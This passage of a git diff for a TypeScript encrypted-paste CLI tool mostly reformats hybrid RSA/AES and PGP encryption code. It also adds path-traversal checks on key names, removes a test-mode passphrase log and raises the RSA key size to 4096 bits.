         // (Future enhancement: use OpenPGP multi-recipient encryption)
-        console.warn('Note: Encrypting separately for each recipient. Content will be duplicated.');
+        console.warn(
+          "Note: Encrypting separately for each recipient. Content will be duplicated.",
+        );
 
         // For now, just use the first recipient
         // TODO: Implement proper multi-recipient PGP encryption
         const keyInfo = firstRecipient.keyInfo!;
-        const keyPath = typeof keyInfo.path === 'string' ? keyInfo.path : keyInfo.path.public;
-        const publicKey = await fsPromises.readFile(keyPath, 'utf8');
+        const keyPath =
+          typeof keyInfo.path === "string" ? keyInfo.path : keyInfo.path.public;
+        const publicKey = await fsPromises.readFile(keyPath, "utf8");
 
         await updateLastUsed(firstRecipient.identifier);
-        return await createPgpEncryptedMessage(content, publicKey, firstRecipient.identifier);
+        return await createPgpEncryptedMessage(
+          content,
+          publicKey,
+          firstRecipient.identifier,
+        );
       } else {
         // Standard encryption also only supports one recipient
         // Use the first recipient
         const keyInfo = firstRecipient.keyInfo!;
-        const publicKey = await fsPromises.readFile(keyInfo.public!, 'utf8');
+        const publicKey = await fsPromises.readFile(keyInfo.public!, "utf8");
         await updateLastUsed(firstRecipient.identifier);
 
         // Continue with standard encryption (fall through to standard encryption logic below)
@@ -97,15 +106,15 @@ export async function encryptContent(
           name: firstRecipient.identifier,
           fingerprint: keyInfo.fingerprint,
           username: keyInfo.username,
-          email: keyInfo.email
+          email: keyInfo.email,
         };
 
         // Generate a random symmetric key
         const symmetricKey = crypto.randomBytes(32);
         const iv = crypto.randomBytes(16);
-        const cipher = crypto.createCipheriv('aes-256-gcm', symmetricKey, iv);
+        const cipher = crypto.createCipheriv("aes-256-gcm", symmetricKey, iv);
 
-        let encryptedContent = cipher.update(content, 'utf8');
+        let encryptedContent = cipher.update(content, "utf8");
         encryptedContent = Buffer.concat([encryptedContent, cipher.final()]);
         const authTag = cipher.getAuthTag();
 
@@ -114,22 +123,22 @@ export async function encryptContent(
           {
             key: publicKey,
             padding: crypto.constants.RSA_PKCS1_OAEP_PADDING,
-            oaepHash: 'sha256'
+            oaepHash: "sha256",
           },
-          symmetricKey
+          symmetricKey,
         );
 
         const encryptedData: EncryptedDataV2 = {
           version: 2,
           metadata: {
-            sender: 'self',
+            sender: "self",
             recipient: recipientInfo,
-            timestamp: new Date().toISOString()
+            timestamp: new Date().toISOString(),
           },
-          encryptedKey: encryptedKey.toString('base64'),
-          iv: iv.toString('base64'),
-          authTag: authTag.toString('base64'),
-          encryptedContent: encryptedContent.toString('base64')
+          encryptedKey: encryptedKey.toString("base64"),
+          iv: iv.toString("base64"),
+          authTag: authTag.toString("base64"),
+          encryptedContent: encryptedContent.toString("base64"),
         };
 
         return Buffer.from(JSON.stringify(encryptedData));
@@ -139,15 +148,17 @@ export async function encryptContent(
     // Single recipient or self encryption (backward compatible path)
     let publicKey: string;
     let recipientInfo: RecipientInfo;
-    let keyType: 'standard' | 'pgp' = 'standard';
+    let keyType: "standard" | "pgp" = "standard";
 
-    if (recipientName && typeof recipientName === 'string') {
+    if (recipientName && typeof recipientName === "string") {
       // Use the resolver for single recipient
-      const { resolveRecipient, isPgpRecipient } = await import('./recipientResolver.js');
+      const { resolveRecipient, isPgpRecipient } = await import(
+        "./recipientResolver.js"
+      );
 
       const resolved = await resolveRecipient(recipientName, {
         silent: false,
-        autoFetch: true
+        autoFetch: true,
       });
 
       if (!resolved.keyInfo) {
@@ -157,100 +168,115 @@ export async function encryptContent(
       const friendKey = resolved.keyInfo;
 
       // Determine key type
-      if (friendKey.type === 'pgp' || friendKey.type === 'keybase' || friendKey.type === 'github') {
-        keyType = 'pgp';
+      if (
+        friendKey.type === "pgp" ||
+        friendKey.type === "keybase" ||
+        friendKey.type === "github"
+      ) {
+        keyType = "pgp";
       }
 
-      const keyPath = typeof friendKey.path === 'string' ? friendKey.path : friendKey.path.public;
-      publicKey = await fsPromises.readFile(keyPath, 'utf8');
+      const keyPath =
+        typeof friendKey.path === "string"
+          ? friendKey.path
+          : friendKey.path.public;
+      publicKey = await fsPromises.readFile(keyPath, "utf8");
 
       recipientInfo = {
         type: resolved.type as any,
         name: recipientName,
         fingerprint: friendKey.fingerprint,
         username: friendKey.username,
-        email: friendKey.email
+        email: friendKey.email,
       };
 
       // Update last used timestamp
       await updateLastUsed(resolved.identifier);
     } else {
       // Encrypt for self
-      const selfKey = await getKey('self');
+      const selfKey = await getKey("self");
       if (!selfKey) {
-        throw new Error('No personal key found. Generate one first.');
+        throw new Error("No personal key found. Generate one first.");
       }
 
-      publicKey = await fsPromises.readFile(selfKey.public!, 'utf8');
+      publicKey = await fsPromises.readFile(selfKey.public!, "utf8");
       recipientInfo = {
-        type: 'self',
-        name: 'self',
-        fingerprint: selfKey.fingerprint
+        type: "self",
+        name: "self",
+        fingerprint: selfKey.fingerprint,
       };
     }
 
     // If usePgp is true or the key is a PGP key, use PGP encryption
-    if (usePgp || keyType === 'pgp') {
+    if (usePgp || keyType === "pgp") {
       // PGP encryption requires a recipient
       if (!recipientName || Array.isArray(recipientName)) {
-        throw new Error('PGP encryption requires specifying a single recipient with --for. Self-encryption is not supported for PGP.');
+        throw new Error(
+          "PGP encryption requires specifying a single recipient with --for. Self-encryption is not supported for PGP.",
+        );
       }
       return await createPgpEncryptedMessage(content, publicKey, recipientName);
     }
-    
+
     // Otherwise use standard RSA/AES hybrid encryption
     // Generate a random symmetric key
     const symmetricKey = crypto.randomBytes(32); // 256 bits for AES-256
     const iv = crypto.randomBytes(16); // 128 bits for AES IV
-    
+
     // Encrypt the content with the symmetric key
-    const cipher = crypto.createCipheriv('aes-256-gcm', symmetricKey, iv);
+    const cipher = crypto.createCipheriv("aes-256-gcm", symmetricKey, iv);
     let encryptedContent = cipher.update(content);
     encryptedContent = Buffer.concat([encryptedContent, cipher.final()]);
     const authTag = cipher.getAuthTag();
-    
+
     // Encrypt the symmetric key with the recipient's public key
     let encryptedSymmetricKey: Buffer;
     try {
       // Check if the public key is in PEM format
-      if (!publicKey.includes('-----BEGIN PUBLIC KEY-----') && 
-          !publicKey.includes('-----BEGIN RSA PUBLIC KEY-----')) {
-        console.log('Public key is not in expected PEM format, attempting to convert...');
-        
+      if (
+        !publicKey.includes("-----BEGIN PUBLIC KEY-----") &&
+        !publicKey.includes("-----BEGIN RSA PUBLIC KEY-----")
+      ) {
+        console.log(
+          "Public key is not in expected PEM format, attempting to convert...",
+        );
+
         // Try to parse it as a PGP key and extract the RSA key
-        if (publicKey.includes('-----BEGIN PGP PUBLIC KEY BLOCK-----')) {
-          throw new Error('PGP key detected. For PGP keys, use the --pgp flag to enable PGP encryption mode.');
+        if (publicKey.includes("-----BEGIN PGP PUBLIC KEY BLOCK-----")) {
+          throw new Error(
+            "PGP key detected. For PGP keys, use the --pgp flag to enable PGP encryption mode.",
+          );
         } else {
-          throw new Error('Unsupported key format. Key must be in PEM format.');
+          throw new Error("Unsupported key format. Key must be in PEM format.");
         }
       }
-      
-      console.log('Using RSA encryption with PEM format public key');
+
+      console.log("Using RSA encryption with PEM format public key");
       encryptedSymmetricKey = crypto.publicEncrypt(
         {
           key: publicKey,
           padding: crypto.constants.RSA_PKCS1_OAEP_PADDING,
         },
-        symmetricKey
+        symmetricKey,
       );
     } catch (error: any) {
       throw new Error(`RSA encryption failed: ${error.message}`);
     }
-    
+
     // Combine everything into a single structure with metadata
     const encryptedData: EncryptedDataV2 = {
       version: 2, // Standard version with metadata
       metadata: {
-        sender: 'self',
+        sender: "self",
         recipient: recipientInfo,
-        timestamp: new Date().toISOString()
+        timestamp: new Date().toISOString(),
       },
-      encryptedKey: encryptedSymmetricKey.toString('base64'),
-      iv: iv.toString('base64'),
-      authTag: authTag.toString('base64'),
-      encryptedContent: encryptedContent.toString('base64')
+      encryptedKey: encryptedSymmetricKey.toString("base64"),
+      iv: iv.toString("base64"),
+      authTag: authTag.toString("base64"),
+      encryptedContent: encryptedContent.toString("base64"),
     };
-    
+
     // Return as JSON string
     return Buffer.from(JSON.stringify(encryptedData));
   } catch (error: any) {
@@ -260,15 +286,17 @@ export async function encryptContent(
 
 // Decrypt content
 export async function decryptContent(
-  encryptedBuffer: Buffer, 
-  pgpPrivateKeyPath: string | null = null, 
-  pgpPassphrase: string | null = null, 
-  useGpgKeyring: boolean = true
+  encryptedBuffer: Buffer,
+  pgpPrivateKeyPath: string | null = null,
+  pgpPassphrase: string | null = null,
+  useGpgKeyring: boolean = true,
 ): Promise<DecryptionResult> {
   try {
     // Parse the encrypted data
-    const encryptedData = JSON.parse(encryptedBuffer.toString()) as EncryptedData;
-    
+    const encryptedData = JSON.parse(
+      encryptedBuffer.toString(),
+    ) as EncryptedData;
+
     // Handle different versions
     if (encryptedData.version === 1) {
       // Legacy format - try to decrypt with personal key
@@ -278,180 +306,231 @@ export async function decryptContent(
       return decryptV2Content(encryptedData);
     } else if (encryptedData.version === 3) {
       // PGP encrypted format
-      
+
       // If using GPG keyring is enabled, try that first without requiring a private key path
       if (useGpgKeyring) {
         try {
-          console.log('Attempting to decrypt with system GPG keyring...');
+          console.log("Attempting to decrypt with system GPG keyring...");
           // We don't need a private key file or passphrase for this method
-          const result = await decryptPgpMessage(encryptedBuffer, null, null, true);
-          
+          const result = await decryptPgpMessage(
+            encryptedBuffer,
+            null,
+            null,
+            true,
+          );
+
           // If successful, return the result
           if (result && result.content) {
             return {
-              decryptedContent: result.content.toString('utf8'),
-              senderInfo: result.metadata?.senderInfo
+              decryptedContent: result.content.toString("utf8"),
+              senderInfo: result.metadata?.senderInfo,
             };
           }
         } catch (gpgError: any) {
           // If GPG keyring decryption fails, log the error and fall back to using private key
           console.log(`GPG keyring decryption failed: ${gpgError.message}`);
-          console.log('Falling back to private key decryption if available...');
-          
+          console.log("Falling back to private key decryption if available...");
+
           // Check if we have more detailed information about why GPG failed
           if (gpgError.keyIds && gpgError.keyIds.length > 0) {
-            console.log('This message was encrypted for the following key IDs:');
+            console.log(
+              "This message was encrypted for the following key IDs:",
+            );
             gpgError.keyIds.forEach((key: any) => {
               console.log(`- ${key.type} key: ${key.id}`);
             });
           }
         }
       }
-      
+
       // If we reach here, either GPG keyring wasn't used or it failed, so use private key
       if (!pgpPrivateKeyPath) {
         // Try to find the user's PGP private key in pgp directory
-        const selfKey = await getKey('self');
+        const selfKey = await getKey("self");
         if (!selfKey || !selfKey.private) {
-          throw new Error('PGP encrypted message detected but no PGP private key found. Try importing a key with --import-pgp-key or use --use-gpg-keyring to decrypt with GPG.');
+          throw new Error(
+            "PGP encrypted message detected but no PGP private key found. Try importing a key with --import-pgp-key or use --use-gpg-keyring to decrypt with GPG.",
+          );
         }
         pgpPrivateKeyPath = selfKey.private;
       }
-      
+
       // Prompt for passphrase if not provided
       if (!pgpPassphrase) {
         // Try to prompt for passphrase if running in interactive mode
         try {
-          const { passphrase } = await inquirer.prompt([{
-            type: 'password',
-            name: 'passphrase',
-            message: 'Enter PGP key passphrase:',
-            mask: '*'
-          }]);
-          
+          const { passphrase } = await inquirer.prompt([
+            {
+              type: "password",
+              name: "passphrase",
+              message: "Enter PGP key passphrase:",
+              mask: "*",
+            },
+          ]);
+
           pgpPassphrase = passphrase;
         } catch (promptError) {
           // If we can't prompt (e.g., non-interactive environment), throw error
-          throw new Error('PGP passphrase required for decryption. Please provide with --pgp-passphrase option.');
+          throw new Error(
+            "PGP passphrase required for decryption. Please provide with --pgp-passphrase option.",
+          );
         }
       }
-      
+
       // Read the PGP private key
-      const privateKeyContent = await fsPromises.readFile(pgpPrivateKeyPath, 'utf8');
-      
-      // Check for test mode
-      if (pgpPassphrase === 'TEST_MODE') {
-        console.log('Using TEST_MODE for PGP decryption');
-      }
-      
+      const privateKeyContent = await fsPromises.readFile(
+        pgpPrivateKeyPath,
+        "utf8",
+      );
+
       // Decrypt with PGP using the provided private key
-      const result = await decryptPgpMessage(encryptedBuffer, privateKeyContent, pgpPassphrase, false);
+      const result = await decryptPgpMessage(
+        encryptedBuffer,
+        privateKeyContent,
+        pgpPassphrase,
+        false,
+      );
       return {
-        decryptedContent: result.content.toString('utf8'),
-        senderInfo: result.metadata?.senderInfo
+        decryptedContent: result.content.toString("utf8"),
+        senderInfo: result.metadata?.senderInfo,
       };
     } else {
-      throw new Error(`Unsupported encryption version: ${(encryptedData as any).version}`);
+      throw new Error(
+        `Unsupported encryption version: ${(encryptedData as any).version}`,
+      );
     }
   } catch (error: any) {
     // Enhance error message for common issues
-    if (error.message.includes('Unexpected token') || error.message.includes('JSON')) {
-      throw new Error('Invalid encrypted message format. This may not be a dedpaste encrypted message.');
+    if (
+      error.message.includes("Unexpected token") ||
+      error.message.includes("JSON")
+    ) {
+      throw new Error(
+        "Invalid encrypted message format. This may not be a dedpaste encrypted message.",
+      );
     }
-    
-    if (error.message.includes('Bad passphrase')) {
-      throw new Error('Incorrect passphrase for PGP key. Please try again with the correct passphrase.');
+
+    if (error.message.includes("Bad passphrase")) {
+      throw new Error(
+        "Incorrect passphrase for PGP key. Please try again with the correct passphrase.",
+      );
     }
-    
+
     throw new Error(`Decryption error: ${error.message}`);
   }
 }
 
 // Decrypt legacy content (version 1)
-async function decryptLegacyContent(encryptedData: EncryptedDataV1): Promise<DecryptionResult> {
+async function decryptLegacyContent(
+  encryptedData: EncryptedDataV1,
+): Promise<DecryptionResult> {
   // Get personal private key
-  const selfKey = await getKey('self');
+  const selfKey = await getKey("self");
   if (!selfKey || !selfKey.private) {
-    throw new Error('No personal key found for decryption');
+    throw new Error("No personal key found for decryption");
   }
-  
-  const privateKey = await fsPromises.readFile(selfKey.private, 'utf8');
-  
+
+  const privateKey = await fsPromises.readFile(selfKey.private, "utf8");
+
   // Decrypt the symmetric key with the private key
-  const encryptedSymmetricKey = Buffer.from(encryptedData.encryptedKey, 'base64');
+  const encryptedSymmetricKey = Buffer.from(
+    encryptedData.encryptedKey,
+    "base64",
+  );
   const symmetricKey = crypto.privateDecrypt(
     {
       key: privateKey,
       padding: crypto.constants.RSA_PKCS1_OAEP_PADDING,
     },
-    encryptedSymmetricKey
+    encryptedSymmetricKey,
   );
-  
+
   // Decrypt the content with the symmetric key
-  const iv = Buffer.from(encryptedData.iv, 'base64');
-  const authTag = Buffer.from(encryptedData.authTag, 'base64');
-  const encryptedContent = Buffer.from(encryptedData.encryptedContent, 'base64');
-  
-  const decipher = crypto.createDecipheriv('aes-256-gcm', symmetricKey, iv);
+  const iv = Buffer.from(encryptedData.iv, "base64");
+  const authTag = Buffer.from(encryptedData.authTag, "base64");
+  const encryptedContent = Buffer.from(
+    encryptedData.encryptedContent,
+    "base64",
+  );
+
+  const decipher = crypto.createDecipheriv("aes-256-gcm", symmetricKey, iv);
   decipher.setAuthTag(authTag);
   let decryptedContent = decipher.update(encryptedContent);
   decryptedContent = Buffer.concat([decryptedContent, decipher.final()]);
-  
+
   return {
     decryptedContent: decryptedContent.toString(),
-    senderInfo: undefined
+    senderInfo: undefined,
   };
 }
 
 // Decrypt version 2 content
-async function decryptV2Content(encryptedData: EncryptedDataV2): Promise<DecryptionResult> {
+async function decryptV2Content(
+  encryptedData: EncryptedDataV2,
+): Promise<DecryptionResult> {
   const metadata = encryptedData.metadata;
   let privateKey: string;
-  
+
   // Get self key for comparison
-  const selfKey = await getKey('self');
+  const selfKey = await getKey("self");
   if (!selfKey || !selfKey.private) {
-    throw new Error('No personal key found for decryption');
+    throw new Error("No personal key found for decryption");
   }
-  
+
   // Determine which key to use
-  if (metadata.recipient.type === 'self') {
+  if (metadata.recipient.type === "self") {
     // Encrypted for self
-    privateKey = await fsPromises.readFile(selfKey.private, 'utf8');
-  } else if (metadata.recipient.type === 'friend' && metadata.recipient.name === 'self') {
+    privateKey = await fsPromises.readFile(selfKey.private, "utf8");
+  } else if (
+    metadata.recipient.type === "friend" &&
+    metadata.recipient.name === "self"
+  ) {
     // Encrypted by a friend for us
-    privateKey = await fsPromises.readFile(selfKey.private, 'utf8');
-  } else if (metadata.recipient.fingerprint && metadata.recipient.fingerprint === selfKey.fingerprint) {
+    privateKey = await fsPromises.readFile(selfKey.private, "utf8");
+  } else if (
+    metadata.recipient.fingerprint &&
+    metadata.recipient.fingerprint === selfKey.fingerprint
+  ) {
     // Fingerprint matches our key, even if the name doesn't match
-    console.log(`Note: This paste was labeled for "${metadata.recipient.name}" but the fingerprint matches your key.`);
-    privateKey = await fsPromises.readFile(selfKey.private, 'utf8');
+    console.log(
+      `Note: This paste was labeled for "${metadata.recipient.name}" but the fingerprint matches your key.`,
+    );
+    privateKey = await fsPromises.readFile(selfKey.private, "utf8");
   } else {
-    throw new Error(`This paste was encrypted for ${metadata.recipient.name}, not for you`);
+    throw new Error(
+      `This paste was encrypted for ${metadata.recipient.name}, not for you`,
+    );
   }
-  
+
   // Decrypt the symmetric key with the private key
-  const encryptedSymmetricKey = Buffer.from(encryptedData.encryptedKey, 'base64');
+  const encryptedSymmetricKey = Buffer.from(
+    encryptedData.encryptedKey,
+    "base64",
+  );
   const symmetricKey = crypto.privateDecrypt(
     {
       key: privateKey,
       padding: crypto.constants.RSA_PKCS1_OAEP_PADDING,
     },
-    encryptedSymmetricKey
+    encryptedSymmetricKey,
   );
-  
+
   // Decrypt the content with the symmetric key
-  const iv = Buffer.from(encryptedData.iv, 'base64');
-  const authTag = Buffer.from(encryptedData.authTag, 'base64');
-  const encryptedContent = Buffer.from(encryptedData.encryptedContent, 'base64');
-  
-  const decipher = crypto.createDecipheriv('aes-256-gcm', symmetricKey, iv);
+  const iv = Buffer.from(encryptedData.iv, "base64");
+  const authTag = Buffer.from(encryptedData.authTag, "base64");
+  const encryptedContent = Buffer.from(
+    encryptedData.encryptedContent,
+    "base64",
+  );
+
+  const decipher = crypto.createDecipheriv("aes-256-gcm", symmetricKey, iv);
   decipher.setAuthTag(authTag);
   let decryptedContent = decipher.update(encryptedContent);
   decryptedContent = Buffer.concat([decryptedContent, decipher.final()]);
-  
+
   return {
     decryptedContent: decryptedContent.toString(),
-    senderInfo: metadata.recipient
+    senderInfo: metadata.recipient,
   };
 }
 
@@ -459,7 +538,10 @@ async function decryptV2Content(encryptedData: EncryptedDataV2): Promise<Decrypt
 // Version 4: Streaming Encryption for Large Files
 // ============================================
 
-import type { EncryptedFileHeader, EncryptedChunkHeader } from '../src/types/index.js';
+import type {
+  EncryptedFileHeader,
+  EncryptedChunkHeader,
+} from "../src/types/index.js";
 
 /**
  * Version 4 encrypted file structure.
@@ -493,7 +575,7 @@ export async function createEncryptedHeader(
     throw new Error(`No public key found for recipient: ${recipientName}`);
   }
 
-  const publicKey = await fsPromises.readFile(keyInfo.public, 'utf8');
+  const publicKey = await fsPromises.readFile(keyInfo.public, "utf8");
 
   // Generate a random symmetric key
   const symmetricKey = crypto.randomBytes(32);
@@ -503,7 +585,7 @@ export async function createEncryptedHeader(
     {
       key: publicKey,
       padding: crypto.constants.RSA_PKCS1_OAEP_PADDING,
-      oaepHash: 'sha256',
+      oaepHash: "sha256",
     },
     symmetricKey,
   );
@@ -519,7 +601,7 @@ export async function createEncryptedHeader(
   const header: EncryptedFileHeader = {
     version: 4,
     metadata: {
-      sender: 'self',
+      sender: "self",
       recipient: recipientInfo,
       timestamp: new Date().toISOString(),
       totalChunks,
@@ -527,7 +609,7 @@ export async function createEncryptedHeader(
       chunkSize,
       filename,
     },
-    encryptedKey: encryptedKey.toString('base64'),
+    encryptedKey: encryptedKey.toString("base64"),
   };
 
   await updateLastUsed(recipientName);
@@ -539,15 +621,12 @@ export async function createEncryptedHeader(
  * Encrypt a single chunk using the symmetric key.
  * Returns the chunk with prepended header (IV + authTag + length + encrypted data).
  */
-export function encryptChunk(
-  chunk: Buffer,
-  symmetricKey: Buffer,
-): Buffer {
+export function encryptChunk(chunk: Buffer, symmetricKey: Buffer): Buffer {
   // Generate unique IV for this chunk
   const iv = crypto.randomBytes(16);
 
   // Encrypt the chunk
-  const cipher = crypto.createCipheriv('aes-256-gcm', symmetricKey, iv);
+  const cipher = crypto.createCipheriv("aes-256-gcm", symmetricKey, iv);
   let encrypted = cipher.update(chunk);
   encrypted = Buffer.concat([encrypted, cipher.final()]);
   const authTag = cipher.getAuthTag();
@@ -571,21 +650,26 @@ export function decryptChunk(
   symmetricKey: Buffer,
 ): Buffer {
   if (encryptedChunk.length < CHUNK_HEADER_SIZE) {
-    throw new Error('Invalid encrypted chunk: too short for header');
+    throw new Error("Invalid encrypted chunk: too short for header");
   }
 
   // Extract header components
   const iv = encryptedChunk.subarray(0, 16);
   const authTag = encryptedChunk.subarray(16, 32);
   const encryptedLength = encryptedChunk.readUInt32BE(32);
-  const encryptedData = encryptedChunk.subarray(CHUNK_HEADER_SIZE, CHUNK_HEADER_SIZE + encryptedLength);
+  const encryptedData = encryptedChunk.subarray(
+    CHUNK_HEADER_SIZE,
+    CHUNK_HEADER_SIZE + encryptedLength,
+  );
 
   if (encryptedData.length !== encryptedLength) {
-    throw new Error(`Invalid encrypted chunk: expected ${encryptedLength} bytes, got ${encryptedData.length}`);
+    throw new Error(
+      `Invalid encrypted chunk: expected ${encryptedLength} bytes, got ${encryptedData.length}`,
+    );
   }
 
   // Decrypt
-  const decipher = crypto.createDecipheriv('aes-256-gcm', symmetricKey, iv);
+  const decipher = crypto.createDecipheriv("aes-256-gcm", symmetricKey, iv);
   decipher.setAuthTag(authTag);
   let decrypted = decipher.update(encryptedData);
   decrypted = Buffer.concat([decrypted, decipher.final()]);
@@ -615,24 +699,25 @@ export async function decryptSymmetricKey(
   let privateKey: string;
 
   if (privateKeyPath) {
-    privateKey = await fsPromises.readFile(privateKeyPath, 'utf8');
+    privateKey = await fsPromises.readFile(privateKeyPath, "utf8");
   } else {
     // Try to get self key
-    const selfKey = await getKey('self');
+    const selfKey = await getKey("self");
     if (!selfKey) {
-      throw new Error('No private key available for decryption');
+      throw new Error("No private key available for decryption");
     }
-    const keyPath = typeof selfKey.path === 'string' ? selfKey.path : selfKey.path.private;
-    privateKey = await fsPromises.readFile(keyPath, 'utf8');
+    const keyPath =
+      typeof selfKey.path === "string" ? selfKey.path : selfKey.path.private;
+    privateKey = await fsPromises.readFile(keyPath, "utf8");
   }
 
   // Decrypt the symmetric key
-  const encryptedKey = Buffer.from(header.encryptedKey, 'base64');
+  const encryptedKey = Buffer.from(header.encryptedKey, "base64");
   const symmetricKey = crypto.privateDecrypt(
     {
       key: privateKey,
       padding: crypto.constants.RSA_PKCS1_OAEP_PADDING,
-      oaepHash: 'sha256',
+      oaepHash: "sha256",
     },
     encryptedKey,
   );
@@ -645,7 +730,7 @@ export async function decryptSymmetricKey(
  */
 export function isStreamingEncryption(data: Buffer | string): boolean {
   try {
-    const str = typeof data === 'string' ? data : data.toString('utf8');
+    const str = typeof data === "string" ? data : data.toString("utf8");
     const parsed = JSON.parse(str);
     return parsed.version === 4;
   } catch {

--- a/cli/keyManager.ts
+++ b/cli/keyManager.ts
@@ -1,18 +1,18 @@
 // Key database structure and management functions
-import fs from 'fs';
-import path from 'path';
-import { promises as fsPromises } from 'fs';
-import { homedir } from 'os';
-import crypto from 'crypto';
-import type { KeyInfo, KeyDatabase } from '../src/types/index.js';
+import fs from "fs";
+import path from "path";
+import { promises as fsPromises } from "fs";
+import { homedir } from "os";
+import crypto from "crypto";
+import type { KeyInfo, KeyDatabase } from "../src/types/index.js";
 
 // Constants
-export const DEFAULT_KEY_DIR = path.join(homedir(), '.dedpaste', 'keys');
-export const FRIENDS_KEY_DIR = path.join(homedir(), '.dedpaste', 'friends');
-export const KEY_DB_PATH = path.join(homedir(), '.dedpaste', 'keydb.json');
-export const PGP_KEY_DIR = path.join(homedir(), '.dedpaste', 'pgp');
-export const KEYBASE_KEY_DIR = path.join(homedir(), '.dedpaste', 'keybase');
-export const GITHUB_KEY_DIR = path.join(homedir(), '.dedpaste', 'github');
+export const DEFAULT_KEY_DIR = path.join(homedir(), ".dedpaste", "keys");
+export const FRIENDS_KEY_DIR = path.join(homedir(), ".dedpaste", "friends");
+export const KEY_DB_PATH = path.join(homedir(), ".dedpaste", "keydb.json");
+export const PGP_KEY_DIR = path.join(homedir(), ".dedpaste", "pgp");
+export const KEYBASE_KEY_DIR = path.join(homedir(), ".dedpaste", "keybase");
+export const GITHUB_KEY_DIR = path.join(homedir(), ".dedpaste", "github");
 
 // Directory structure interface
 interface KeyDirectories {
@@ -23,6 +23,35 @@ interface KeyDirectories {
   GITHUB_KEY_DIR: string;
 }
 
+/**
+ * Sanitizes a key name to prevent path traversal attacks.
+ * Only allows alphanumeric characters, hyphens, dots, underscores, and @ signs.
+ */
+function sanitizeKeyName(name: string): string {
+  const sanitized = name.replace(/[^a-zA-Z0-9._@-]/g, "_");
+  // Prevent hidden files and directory traversal
+  if (sanitized.startsWith(".") || sanitized.includes("..")) {
+    throw new Error(`Invalid key name: "${name}" contains unsafe characters`);
+  }
+  return sanitized;
+}
+
+/**
+ * Validates that a resolved path stays within the intended directory.
+ */
+function validatePathWithinDir(resolvedPath: string, baseDir: string): void {
+  const normalizedBase = path.resolve(baseDir);
+  const normalizedPath = path.resolve(resolvedPath);
+  if (
+    !normalizedPath.startsWith(normalizedBase + path.sep) &&
+    normalizedPath !== normalizedBase
+  ) {
+    throw new Error(
+      "Path traversal detected: resolved path escapes the key directory",
+    );
+  }
+}
+
 // Ensure directories exist
 export async function ensureDirectories(): Promise<KeyDirectories> {
   await fsPromises.mkdir(DEFAULT_KEY_DIR, { recursive: true });
@@ -30,7 +59,13 @@ export async function ensureDirectories(): Promise<KeyDirectories> {
   await fsPromises.mkdir(PGP_KEY_DIR, { recursive: true });
   await fsPromises.mkdir(KEYBASE_KEY_DIR, { recursive: true });
   await fsPromises.mkdir(GITHUB_KEY_DIR, { recursive: true });
-  return { DEFAULT_KEY_DIR, FRIENDS_KEY_DIR, PGP_KEY_DIR, KEYBASE_KEY_DIR, GITHUB_KEY_DIR };
+  return {
+    DEFAULT_KEY_DIR,
+    FRIENDS_KEY_DIR,
+    PGP_KEY_DIR,
+    KEYBASE_KEY_DIR,
+    GITHUB_KEY_DIR,
+  };
 }
 
 // Initialize key database if it doesn't exist
@@ -42,11 +77,11 @@ async function initKeyDatabase(): Promise<KeyDatabase> {
         friends: {},
         pgp: {},
         keybase: {},
-        github: {}
+        github: {},
       },
       groups: {},
       default_friend: null,
-      last_used: null
+      last_used: null,
     };
 
     await fsPromises.writeFile(KEY_DB_PATH, JSON.stringify(defaultDb, null, 2));
@@ -54,7 +89,7 @@ async function initKeyDatabase(): Promise<KeyDatabase> {
   }
 
   // Read existing database
-  const dbContent = await fsPromises.readFile(KEY_DB_PATH, 'utf8');
+  const dbContent = await fsPromises.readFile(KEY_DB_PATH, "utf8");
   const db = JSON.parse(dbContent) as KeyDatabase;
 
   // Ensure new properties exist (for upgrades)
@@ -87,13 +122,13 @@ export async function saveKeyDatabase(db: KeyDatabase): Promise<void> {
 
 // Generate key fingerprint
 function generateFingerprint(keyContent: string): string {
-  const hash = crypto.createHash('sha256');
+  const hash = crypto.createHash("sha256");
   hash.update(keyContent);
-  const digest = hash.digest('hex');
-  
+  const digest = hash.digest("hex");
+
   // Format as colon-separated pairs
   const pairs = digest.match(/.{2}/g);
-  return pairs ? pairs.join(':') : digest;
+  return pairs ? pairs.join(":") : digest;
 }
 
 // Key pair generation result
@@ -107,67 +142,72 @@ interface KeyPairResult {
 // Generate a new key pair
 export async function generateKeyPair(): Promise<KeyPairResult> {
   const { DEFAULT_KEY_DIR } = await ensureDirectories();
-  const privateKeyPath = path.join(DEFAULT_KEY_DIR, 'private.pem');
-  const publicKeyPath = path.join(DEFAULT_KEY_DIR, 'public.pem');
-  
-  // Generate RSA key pair
-  const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
-    modulusLength: 2048,
+  const privateKeyPath = path.join(DEFAULT_KEY_DIR, "private.pem");
+  const publicKeyPath = path.join(DEFAULT_KEY_DIR, "public.pem");
+
+  // Generate RSA key pair (4096-bit per NIST SP 800-57 recommendations)
+  const { privateKey, publicKey } = crypto.generateKeyPairSync("rsa", {
+    modulusLength: 4096,
     publicKeyEncoding: {
-      type: 'spki',
-      format: 'pem'
+      type: "spki",
+      format: "pem",
     },
     privateKeyEncoding: {
-      type: 'pkcs8',
-      format: 'pem'
-    }
+      type: "pkcs8",
+      format: "pem",
+    },
   });
-  
+
   // Write keys to files
   await fsPromises.writeFile(privateKeyPath, privateKey);
   await fsPromises.writeFile(publicKeyPath, publicKey);
-  
+
   // Update key database
   const db = await loadKeyDatabase();
   db.keys.self = {
-    type: 'self',
-    name: 'self',
+    type: "self",
+    name: "self",
     path: publicKeyPath,
     private: privateKeyPath,
     public: publicKeyPath,
     fingerprint: generateFingerprint(publicKey),
-    created: new Date().toISOString()
+    created: new Date().toISOString(),
   };
   await saveKeyDatabase(db);
-  
+
   return { privateKeyPath, publicKeyPath, privateKey, publicKey };
 }
 
 // Add a friend's public key
-export async function addFriendKey(name: string, keyContent: string): Promise<string> {
+export async function addFriendKey(
+  name: string,
+  keyContent: string,
+): Promise<string> {
+  const safeName = sanitizeKeyName(name);
   const { FRIENDS_KEY_DIR } = await ensureDirectories();
-  const keyPath = path.join(FRIENDS_KEY_DIR, `${name}.pem`);
-  
+  const keyPath = path.join(FRIENDS_KEY_DIR, `${safeName}.pem`);
+  validatePathWithinDir(keyPath, FRIENDS_KEY_DIR);
+
   // Write key to file
   await fsPromises.writeFile(keyPath, keyContent);
-  
+
   // Update key database
   const db = await loadKeyDatabase();
   db.keys.friends[name] = {
-    type: 'friend',
+    type: "friend",
     name: name,
     path: keyPath,
     public: keyPath,
     fingerprint: generateFingerprint(keyContent),
     addedDate: new Date().toISOString(),
-    lastUsed: new Date().toISOString()
+    lastUsed: new Date().toISOString(),
   };
-  
+
   // Set as default if it's the first friend
   if (!db.default_friend) {
